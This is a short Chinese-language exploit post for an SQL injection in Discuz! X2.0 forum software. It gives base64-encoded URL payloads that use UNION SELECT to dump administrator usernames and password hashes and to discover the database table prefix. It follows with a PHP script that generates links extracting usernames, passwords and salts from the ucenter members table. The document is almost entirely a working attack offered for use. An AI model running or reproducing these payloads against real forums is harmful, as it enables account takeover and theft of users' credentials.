DZ2.0直接暴管理账号密码(默认前缀的情况下)
/forum.php?mod=p_w_upload;findpost=ss;aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd
29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl
rZSAnYWRtaW58eHx5%3D
base64解码
1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)
from pre_common_member where username like ‘admin|x|y
如果不是默认前缀
暴前缀EXP
/forum.php?mod=p_w_upload;findpost=ss;aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR
VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1
FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D
———————–
再贴个PHP的EXP
<?php
$host=”
http://X2.0论坛地址”;
$affuser=”要爆的用户名username”;
echo ‘<a href=”‘;
echo $host.”forum.php?mod=p_w_upload;findpost=ss;aid=”;
echo urlencode(base64_encode(“1′ and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like ‘%_member|x|y”));
echo ‘” target=”_blank”>爆前缀</a>’;
echo “</br>”;
echo ‘<a href=”‘;
echo $host.”forum.php?mod=p_w_upload;findpost=ss;aid=”;
echo urlencode(base64_encode(“1′ and 1=2 union all select 1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username like ‘$affuser|x|y”));
echo ‘” target=”_blank”>爆password,salt</a>’;
?>
